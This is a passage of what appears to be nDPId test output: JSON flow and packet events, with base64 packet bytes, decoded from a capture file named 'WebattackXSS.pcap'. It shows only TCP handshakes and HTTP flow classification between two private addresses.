-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":2,"flow_last_seen":1499347583209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347583209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5XgjIturMUrFqaAScSAruAAAAgQFtAQCCAoD5RJ7ATtBBgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":3,"flow_last_seen":1499347583211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347583211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hK9AAD4GQSmsEAABwKgKMuV4AFAxSsWpIyLbrIAQAOXKvgAAAQEICgE7QQcD5RJ7"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347584472,"flow_last_seen":1499347584472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347584472,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1499347584472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347584472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XXVAAD4GaFusEAABwKgKMuWGAFAsKR83AAAAAKACchDqTwAAAgQFtAQCCAoBO0JCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":2,"flow_last_seen":1499347584472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347584472,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5YYTf0ohLCkfOKAScSB18gAAAgQFtAQCCAoD5RO3ATtCQgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":3,"flow_last_seen":1499347584473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347584473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XXZAAD4GaGKsEAABwKgKMuWGAFAsKR84E39KIoAQAOUU+gAAAQEICgE7QkID5RO3"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347585744,"flow_last_seen":1499347585744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347585744,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1499347585744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347585744,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CJdAAD4GvTmsEAABwKgKMuWUAFD9vEsXAAAAAKACchDrjwAAAgQFtAQCCAoBO0OAAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":2,"flow_last_seen":1499347585745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347585745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ZQRxaCL\/bxLGKAScSAhRAAAAgQFtAQCCAoD5RT1ATtDgAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5165,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":3,"flow_last_seen":1499347585746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347585746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CJhAAD4GvUCsEAABwKgKMuWUAFD9vEsYEcWgjIAQAOXASwAAAQEICgE7Q4AD5RT1"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347588270,"flow_last_seen":1499347588270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347588270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1499347588270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347588270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nX9AAD4GKFGsEAABwKgKMuWuAFBMCdiIAAAAAKACchANQQAAAgQFtAQCCAoBO0X3AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":2,"flow_last_seen":1499347588270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347588270,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5a7qCbUZTAnYiaAScSBTqgAAAgQFtAQCCAoD5RdtATtF9wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":3,"flow_last_seen":1499347588271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347588271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nYBAAD4GKFisEAABwKgKMuWuAFBMCdiJ6gm1GoAQAOXysAAAAQEICgE7RfgD5Rdt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347589555,"flow_last_seen":1499347589555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347589555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1499347589555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347589555,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QWlAAD4GhGesEAABwKgKMuW8AFCYtAZQAAAAAKACchCRfgAAAgQFtAQCCAoBO0c5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5193,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":2,"flow_last_seen":1499347589555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347589555,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5bxlqZ52mLQGUaAScSBxqgAAAgQFtAQCCAoD5RiuATtHOQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5194,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":3,"flow_last_seen":1499347589557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347589557,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QWpAAD4GhG6sEAABwKgKMuW8AFCYtAZRZamed4AQAOUQsgAAAQEICgE7RzkD5Riu"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5213,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347592060,"flow_last_seen":1499347592060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347592060,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5213,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1499347592060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347592060,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMuXWAFA6JsujAAAAAKACchAoLQAAAgQFtAQCCAoBO0mrAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":2,"flow_last_seen":1499347592060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347592060,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5dZ5GzqJOibLpKAScSBWYgAAAgQFtAQCCAoD5RsgATtJqwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5215,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":3,"flow_last_seen":1499347592061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347592061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMuXWAFA6JsukeRs6ioAQAOX1aQAAAQEICgE7SasD5Rsg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347593330,"flow_last_seen":1499347593330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347593330,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1499347593330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347593330,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8X5xAAD4GZjSsEAABwKgKMuXkAFAOABV0AAAAAKACchAJOAAAAgQFtAQCCAoBO0roAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":2,"flow_last_seen":1499347593330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347593330,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5eQdKIqzDgAVdaAScSBB+AAAAgQFtAQCCAoD5RxeATtK6AEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":3,"flow_last_seen":1499347593331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347593331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0X51AAD4GZjusEAABwKgKMuXkAFAOABV1HSiKtIAQAOXg\/gAAAQEICgE7SukD5Rxe"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347594595,"flow_last_seen":1499347594595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347594595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1499347594595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347594595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80FRAAD4G9XusEAABwKgKMuXyAFCOVJxwAAAAAKACchAAnQAAAgQFtAQCCAoBO0wkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":2,"flow_last_seen":1499347594595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347594595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5fJ5A+8AjlSccaAScSB3+AAAAgQFtAQCCAoD5R2aATtMJAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":3,"flow_last_seen":1499347594597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347594597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00FVAAD4G9YKsEAABwKgKMuXyAFCOVJxxeQPvAYAQAOUW\/wAAAQEICgE7TCUD5R2a"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347597121,"flow_last_seen":1499347597121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1499347597121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347597121,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xm5AAD4GZ2KsEAABwKgKMuYMAFDbqxDyAAAAAKACchA8MgAAAgQFtAQCCAoBO06cAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":2,"flow_last_seen":1499347597121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347597121,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5gw3EDJr26sQ86AScSCvnwAAAgQFtAQCCAoD5SARATtOnAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":3,"flow_last_seen":1499347597122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347597122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Xm9AAD4GZ2msEAABwKgKMuYMAFDbqxDzNxAybIAQAOVOpwAAAQEICgE7TpwD5SAR"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 